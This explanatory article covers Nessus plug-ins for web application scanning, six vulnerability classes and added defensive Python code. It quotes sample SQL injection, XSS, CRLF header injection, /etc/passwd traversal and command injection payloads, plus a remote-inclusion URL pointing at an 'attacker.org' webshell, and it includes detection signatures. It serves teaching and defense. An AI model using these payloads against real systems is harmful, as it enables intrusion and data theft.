Nessus, ranked first among the top 100 security tools, has traditionally been known as a “network” vulnerability scanner. It scans operating systems and services at the TCP/UDP layer and below and discovers vulnerabilities in those services; it has not been known for scanning the applications running on top of the TCP/UDP layer. Scanning and discovering vulnerabilities in web applications have been left to specialized scanners that only scan and pen-test web applications.
Recently, the Nessus research team has extended the capability of Nessus to start targeting web applications. Research is still ongoing to produce effective plug-ins and parameters for enhancing this web application scanning capability. There is now a Nessus plug-in for every web application vulnerability class; the following is a list of these vulnerability classes along with references to their corresponding Nessus plug-ins:
1. SQL Injection Vulnerability Class
Plug-in Name: sql_injection.nasl
Plug-in Family: CGI abuses
This plug-in tests for SQL Injection vulnerabilities. It tries to insert abnormal data into any input field the user has access to and checks whether the application returns an unexpected error. For example, inserting data such as ' or 1=1;-- or ' or 'a'='a could return an error or break the application if it is vulnerable to SQL Injection.
2. Cross-Site Scripting (XSS) Vulnerability Class
Plug-in Name: torture_cgi_cross_site_scripting.nasl
Plug-in Family: CGI abuses : XSS
This plug-in tests for both reflective and persistent XSS vulnerabilities. Just like the previous test (i.e. SQL Injection), this test involves inserting abnormal data into input fields and monitoring how the application behaves. Simple examples of XSS injection are:
(a) <script>alert('XSS')</script>
(b) <IMG """><SCRIPT>alert("XSS" )</SCRIPT>">
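From the defender's side, the SQL Injection and XSS probes described above leave recognisable traces in web server access logs. The following Python example, added here and not part of the original article or of Nessus, URL-decodes the query string of each request in a few constructed Common Log Format lines and flags the two probe families; the log lines and the signature patterns are my own constructions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Common Log Format); not real traffic.
# Line 2 carries the "' or 1=1;--" probe, lines 3 and 4 the two XSS examples above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /login.php?user=%27+or+1%3D1%3B-- HTTP/1.1" 500 0
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /search.php?q=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E HTTP/1.1" 200 640
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /search.php?q=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E HTTP/1.1" 200 640
"""

# ip, method, request target and status code from one CLF line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures for the two probe families, matched against the URL-decoded query string.
SIGNATURES = {
    "sqli": re.compile(r"(?i)('\s*or\s*1\s*=\s*1|'\s*or\s*'[^']*'\s*=\s*'|;\s*--)"),
    "xss": re.compile(r"(?i)(<script\b|<img\b[^>]*>)"),
}


def classify_request(target):
    """Return the set of probe families whose signature matches the decoded query string."""
    if "?" not in target:
        return set()
    query = unquote_plus(target.split("?", 1)[1])  # decode %27, %3C, '+' etc. first
    return {name for name, rx in SIGNATURES.items() if rx.search(query)}


def scan_log(text):
    """Return (ip, path, status, families) for every request that matches a signature.
    A 500 status next to an 'sqli' hit is the error response the plug-in looks for."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        families = classify_request(m["target"])
        if families:
            hits.append((m["ip"], m["target"].split("?")[0], int(m["status"]), families))
    return hits
```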
3. HTTP Header Injection Vulnerability Class
Plug-in Name: torture_cgi_header_injection.nasl
Plug-in Family: CGI abuses
This plug-in injects arbitrary data into the input fields of the web application and monitors the HTTP headers of the responses. If a response header can be influenced by the injected data, the application is said to be vulnerable to HTTP Header Injection. For example, suppose the “username” sent from an input field becomes part of the cookie set by the server; this cookie is sent in the HTTP response. We can enter the following data in the username field:
myname\r\nSet-Cookie: MyInjectedCookie=injected
If the server is vulnerable to HTTP Header Injection, the response header will contain an additional entry that creates a new (injected) cookie in the user’s browser.
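The following Python example, added here and not taken from the article or from Nessus, shows the cookie scenario above in both forms: a builder that copies the username into the Set-Cookie header verbatim, and a hardened one that only accepts RFC 6265 cookie-octets. The header names, the user cookie and the probe string are constructed for the demonstration.

```python
import re

# Vulnerable shape from the scenario above: the username is written into the
# Set-Cookie header verbatim, so a CR LF inside it terminates the header early
# and whatever follows becomes a second header line.
def set_cookie_header_unsafe(username):
    return f"Set-Cookie: user={username}"


# Hardened form: allow only RFC 6265 cookie-octets
# (%x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E), which excludes CR, LF and
# every other control character, so no second header line can ever be formed.
COOKIE_OCTET_RE = re.compile(r"^[\x21\x23-\x2b\x2d-\x3a\x3c-\x5b\x5d-\x7e]*$")


def set_cookie_header_safe(username):
    if not COOKIE_OCTET_RE.match(username):
        raise ValueError("cookie value contains characters outside RFC 6265 cookie-octet")
    return f"Set-Cookie: user={username}"


def header_names(raw_block):
    """Split a raw header block on CR LF the way a browser does and return the names.
    Two 'Set-Cookie' entries produced from a single input means the injection worked."""
    return [line.split(":", 1)[0] for line in raw_block.split("\r\n") if line]


# The probe string quoted in the text above (constructed here, not captured traffic).
PROBE = "myname\r\nSet-Cookie: MyInjectedCookie=injected"


def demo():
    """Return (header names from the unsafe builder, whether the safe builder refused the probe)."""
    unsafe_names = header_names(set_cookie_header_unsafe(PROBE))
    try:
        set_cookie_header_safe(PROBE)
        refused = False
    except ValueError:
        refused = True
    return unsafe_names, refused
```

Real HTTP libraries apply the same kind of check inside their header-writing routines; the point of the example is that the rejection has to happen before the value is serialised, not after.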
4. Path Traversal Vulnerability Class
Plug-in Name: torture_cgi_directory_traversal.nasl
Plug-in Family: CGI abuses
This plug-in discovers whether the web application is vulnerable to a path traversal vulnerability. Path Traversal (or Directory Traversal) happens when the end user (probably an attacker) is able to get outside the permitted web directory and navigate through directories he/she is not allowed to access. For example, under normal circumstances the end user cannot access the file /etc/passwd on the web server. However, if the web server is vulnerable to Directory Traversal, inserting data like ../../../../../../../../../etc/passwd in an input field could allow the attacker to view the passwd file.
5. Remote File Inclusion Vulnerability Class
Plug-in Name: torture_cgi_remote_file_inclusion.nasl
Plug-in Family: CGI abuses
A web application is said to be vulnerable to Remote File Inclusion when the attacker is able to execute (i.e. include) his/her own PHP code in that remote web application. The attack exploits the PHP function include($filename), or other similar functions, when the argument $filename can be modified from the client side and is not properly checked on the server side. For example, the application might display a page requested by the URL:
http://www.example.com/index.php?page=validpagename
The PHP code that processes the page variable is:
include($page);
The attacker can run his/her own PHP code using a URL like this:
http://www.example.com/index.php?page=http://attacker.org/webshell.php
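Both the Path Traversal section and the Remote File Inclusion section above come down to the same defect: a client-supplied value is used as a file path without being constrained to one directory. The Python example below is added here (it is not the article's or any PHP project's code) and shows a page resolver that allow-lists the shape of the page name and then confirms the canonical path still lies under a pages directory; the webroot layout and the validpagename.php fixture are constructed for the demonstration.

```python
from pathlib import Path
import re
import tempfile

# Allow-list the shape of the ?page= value: letters, digits, '_' and '-' only.
# No slashes, dots or colons, so '../../etc/passwd' and
# 'http://attacker.org/webshell.php' are refused before any path is built.
PAGE_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def resolve_page(webroot, page):
    """Map the ?page= parameter to a file that must live directly under webroot/pages."""
    if not PAGE_NAME_RE.match(page):
        raise ValueError(f"rejected page name: {page!r}")
    base = (Path(webroot) / "pages").resolve()
    # Canonicalise (follows symlinks) and confirm the result is still inside base;
    # this second check catches a symlinked page that points outside the directory,
    # which the regex alone would not notice.
    candidate = (base / f"{page}.php").resolve()
    if base not in candidate.parents:
        raise ValueError("resolved path escapes the pages directory")
    if not candidate.is_file():
        raise FileNotFoundError(page)
    return candidate


def make_demo_webroot():
    """Constructed fixture: a temporary webroot holding one valid page."""
    root = Path(tempfile.mkdtemp())
    (root / "pages").mkdir()
    (root / "pages" / "validpagename.php").write_text("<?php echo 'ok'; ?>")
    return root


def check(webroot, page):
    """Return 'ok' or the exception class name explaining why the page was refused."""
    try:
        resolve_page(webroot, page)
        return "ok"
    except (ValueError, FileNotFoundError) as e:
        return type(e).__name__
```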
6. Command Execution Vulnerability Class
Plug-in Name: torture_cgi_command_exec.nasl
Plug-in Family: CGI abuses
A Command Execution vulnerability allows the attacker to execute arbitrary commands on the remote web server due to the lack of proper input validation. For example, an application that takes an IP address from the user and performs a “ping” request towards that target might use a URL like:
http://www.example.org/index.php?ip=1.1.1.1
The PHP code that processes this URL might be the following:
system("ping $ip");
Due to the lack of input validation, an attacker can execute any command using a URL like:
http://www.example.org/index.php?ip=1.1.1.1;ls
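The fix for the ping example above has two parts: accept only values that parse as an IP address, and hand the value to ping as a single argv element so no shell ever interprets it. This Python example is added here and is not the article's code; the function names are my own.

```python
import ipaddress
import subprocess
import sys


def build_ping_argv(ip, count=1):
    """Validate the user-supplied value as an IP address and return a ping argv list.
    The vulnerable form above, system("ping $ip"), hands the whole string to /bin/sh,
    so '1.1.1.1;ls' becomes two commands. Here the value must parse as an address
    (so ';', spaces, '$(' and hostnames are all refused) and is passed as one
    argv element that the shell never sees."""
    try:
        addr = ipaddress.ip_address(ip.strip())
    except ValueError as e:
        raise ValueError(f"rejected ping target: {ip!r}") from e
    count_flag = "-n" if sys.platform.startswith("win") else "-c"  # ping flag differs per OS
    return ["ping", count_flag, str(count), str(addr)]


def is_acceptable_target(ip):
    """Boolean form of the same check, for validating input before it reaches anything."""
    try:
        build_ping_argv(ip)
        return True
    except ValueError:
        return False


def run_ping(ip, timeout=5):
    """Run ping without a shell: a list argv with the default shell=False."""
    proc = subprocess.run(build_ping_argv(ip), capture_output=True, text=True, timeout=timeout)
    return proc.returncode == 0
```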
For scanning web applications, two Nessus plug-in families must be selected: “CGI Abuses” and “CGI Abuses: XSS.” These two families contain all plug-ins related to web application penetration testing, including the six plug-ins mentioned above. It is also recommended to select other plug-in families such as “Database” and “FTP”, since a web application normally needs a database for storage and an FTP server so that the administrator can remotely update the files.
I created the following downloadable Nessus file <webapps.nessus>, which contains three policies for web application testing; each policy is defined by its level of aggressiveness as follows:
(1) Web Application Test (level 1)
- This policy is the least aggressive one among the three.
- It has the following Plug-in Families enabled: CGI Abuses, CGI Abuses: XSS, Databases, General, Service Detection, and Web Servers.
- This policy has the option “Safe Checks” enabled; this option will make sure that the scan does not cause the target to crash.
- The following advanced Global Variable Settings options are enabled:
Enable CGI Scanning, Enable Experimental Scripts, and Thorough Tests (slow)
- The following advanced Web Application Tests Settings options are enabled:
Enabled Web Application Tests and Send POST requests
(2) Web Application Test (level 2)
- This policy is the moderately aggressive one among the three.
- It has the following Plug-in Families enabled: CGI Abuses, CGI Abuses: XSS, Databases, FTP, Gain a Shell Remotely, Gain Root Remotely, General, Service Detection, and Web Servers.
- This policy has the option “Safe Checks” enabled; this option will make sure that the scan does not cause the target to crash.
- The following advanced Global Variable Settings options are enabled:
Enable CGI Scanning, Enable Experimental Scripts, and Thorough Tests (slow)
- The following advanced Web Application Tests Settings options are enabled:
Enabled Web Application Tests and Send POST requests
(3) Web Application Test (level 3)
- This policy is the most aggressive one among the three.
- It has the following Plug-in Families enabled: CGI Abuses, CGI Abuses: XSS, Databases, FTP, Gain a Shell Remotely, Gain Root Remotely, General, Service Detection, and Web Servers.
- This policy does NOT have the option “Safe Checks” enabled; this will cause the scanner to fire dangerous plug-ins that may cause DoS or may cause the target to crash.
- The following advanced Global Variable Settings options are enabled:
Enable CGI Scanning, Enable Experimental Scripts, and Thorough Tests (slow)
- The following advanced Web Application Tests Settings options are enabled:
Enabled Web Application Tests, Send POST requests, and Test Embedded Web Servers.
Finally, it is worth mentioning that Nessus can integrate Nikto, a small and fast web server scanner, into its scan. This is done through the plug-in Nikto.nasl, which is part of the CGI Abuses family. There are a few important points to take into consideration when incorporating Nikto with Nessus:
- The Nikto.nasl plug-in only runs on UNIX systems.
- The Nikto application must be installed manually by the user.
- The script nikto.pl must be in the PATH of the same account that runs Nessus.